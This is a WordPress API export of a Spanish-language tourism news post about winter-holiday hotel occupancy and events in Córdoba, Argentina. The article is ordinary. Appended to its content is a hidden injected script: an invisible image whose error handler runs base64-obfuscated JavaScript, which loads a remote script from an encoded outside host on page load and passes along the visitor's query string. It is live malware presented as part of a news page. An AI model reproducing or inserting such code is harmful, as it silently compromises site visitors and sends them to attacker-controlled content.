{"id":7165,"date":"2023-08-08T12:12:24","date_gmt":"2023-08-08T15:12:24","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7165"},"modified":"2025-08-13T15:55:56","modified_gmt":"2025-08-13T18:55:56","slug":"vacaciones-de-invierno-mas-del-70-de-ocupacion-turistica-en-cordoba","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7165","title":{"rendered":"Vacaciones de invierno: M\u00e1s del 70% de ocupaci\u00f3n tur\u00edstica en C\u00f3rdoba"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#ac8109\"><em>Las vacaciones de invierno tuvieron mucho movimiento tur\u00edstico en el pa\u00eds. C\u00f3rdoba fue de las provincias m\u00e1s visitadas.<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"\" class=\"wp-image-7028\" width=\"338\" height=\"168\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-324x160.jpg 324w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 338px) 100vw, 338px\" \/><\/a><figcaption class=\"wp-element-caption\">                       <em><mark class=\"has-inline-color has-vivid-cyan-blue-color\">Publicidad<\/mark><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>En estas vacaciones de invierno, C\u00f3rdoba super\u00f3 el 70% de ocupaci\u00f3n en sus principales destinos. Como es habitual, la provincia de las sierras tuvo una concurrencia muy grande.<\/p>\n\n\n\n<p>\u00abEstoy muy feliz por la temporada invernal, el Hotel Quinto Centenario, ex Sheraton, ocup\u00f3 el pasado s\u00e1bado sus 188 habitaciones, mientras que los otros hoteles de cinco y cuatro estrellas presentaron una ocupaci\u00f3n del 70%, logrando un r\u00e9cord en el turismo de la capital cordobesa, mientras que los gastron\u00f3micos trabajaron en un 80%\u00bb, manifest\u00f3 Alejandro Lastra, el presidente de la Agencia C\u00f3rdoba Turismo.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1.jpg\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1.jpg\" alt=\"\" class=\"wp-image-7170\" width=\"512\" height=\"341\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1.jpg 960w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1-768x511.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1-696x463.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1-631x420.jpg 631w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Cordoba-Capital-01-1-800x533.jpg 800w\" sizes=\"(max-width: 512px) 100vw, 512px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Seg\u00fan lo informado por las secretar\u00edas de turismo de los municipios, la ocupaci\u00f3n durante estas vacaciones de invierno fue la siguiente:<\/p>\n\n\n\n<p>En Punilla, Villa General Belgrano, La Cumbrecita, Villa Yacanto, San Javier y La Cumbre el promedio fue del 75%. El movimiento gastron\u00f3mico tambi\u00e9n fue intenso y localidades como Villa Allende y Mendiolaza trabajaron en un 80%.<\/p>\n\n\n\n<p>El \u00e9xito tur\u00edstico confirma el atractivo de C\u00f3rdoba y demuestra su capacidad para atraer a visitantes de todas partes. Estos n\u00fameros se relacionan con la variedad de destinos tur\u00edsticos que ofrece la provincia.<\/p>\n\n\n\n<p>Argentina tiene lugares espl\u00e9ndidos para conocer y es por ello que cada vez son m\u00e1s los argentinos que eligen recorrer el pa\u00eds.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-scaled.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"7172\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-1024x683.jpg\" alt=\"\" class=\"wp-image-7172\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-2048x1365.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-General-Belgrano-02-1-800x533.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay.jpg\"><img decoding=\"async\" width=\"1024\" height=\"364\" data-id=\"7167\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-1024x364.jpg\" alt=\"\" class=\"wp-image-7167\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-1024x364.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-300x107.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-768x273.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-696x247.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-1068x379.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-1183x420.jpg 1183w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-320x114.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-480x170.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay-800x284.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Villa-Carlos-Paz-Puente-Uruguay.jpg 1200w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano.jpg\"><img decoding=\"async\" width=\"900\" height=\"598\" data-id=\"7169\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano.jpg\" alt=\"\" class=\"wp-image-7169\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano.jpg 900w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano-300x199.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano-768x510.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano-696x462.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano-632x420.jpg 632w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano-480x319.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Fiesta-del-Chocolate-Alpino-en-Villa-General-Belgrano-800x532.jpg 800w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p><strong>Diversidad de eventos y actividades<\/strong><\/p>\n\n\n\n<p>La provincia ofreci\u00f3 una buena variedad de eventos para los turistas y eso gener\u00f3 mayor entretenimiento. Actividades como la Fiesta del Chocolate Alpino en Villa General Belgrano, el Festival de M\u00fasica Barroca de Dos Mundos y la segunda edici\u00f3n de Taninos Wine Fest en C\u00f3rdoba capital, entre otras.<\/p>\n\n\n\n<p>C\u00f3rdoba tiene atractivos tur\u00edsticos como el Museo Hist\u00f3rico y la Torre del Reloj en Villa General Belgrano. Con el desaf\u00edo de subir hasta lo m\u00e1s alto, a trav\u00e9s de 98 escalones de escalera caracol.<\/p>\n\n\n\n<p>Otro destino puede ser Nono y sus senderos para hacer trekking o cabalgatas. El Sendero del Arroyo, el Empedrado y el Sendero de La Juntura son los sitios para experimentar esa aventura.<\/p>\n\n\n\n<p>Por \u00faltimo, la visita al Mercado Cordob\u00e9s en C\u00f3rdoba capital. Uno de los lugares m\u00e1s emblem\u00e1ticos de la capital provincial con ferias de econom\u00eda social, shows musicales, gastronom\u00eda en vivo y mucho m\u00e1s en la Supermanzana Mercado Norte.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las vacaciones de invierno tuvieron mucho movimiento tur\u00edstico en el pa\u00eds. C\u00f3rdoba fue de las provincias m\u00e1s visitadas. En estas vacaciones de invierno, C\u00f3rdoba super\u00f3 el 70% de ocupaci\u00f3n en sus principales destinos. Como es habitual, la provincia de las sierras tuvo una concurrencia muy grande. \u00abEstoy muy feliz por la temporada invernal, el Hotel [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,31],"tags":[],"class_list":["post-7165","post","type-post","status-publish","format-standard","hentry","category-argentina","category-colaboradores"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7165"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7165\/revisions"}],"predecessor-version":[{"id":10339,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7165\/revisions\/10339"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}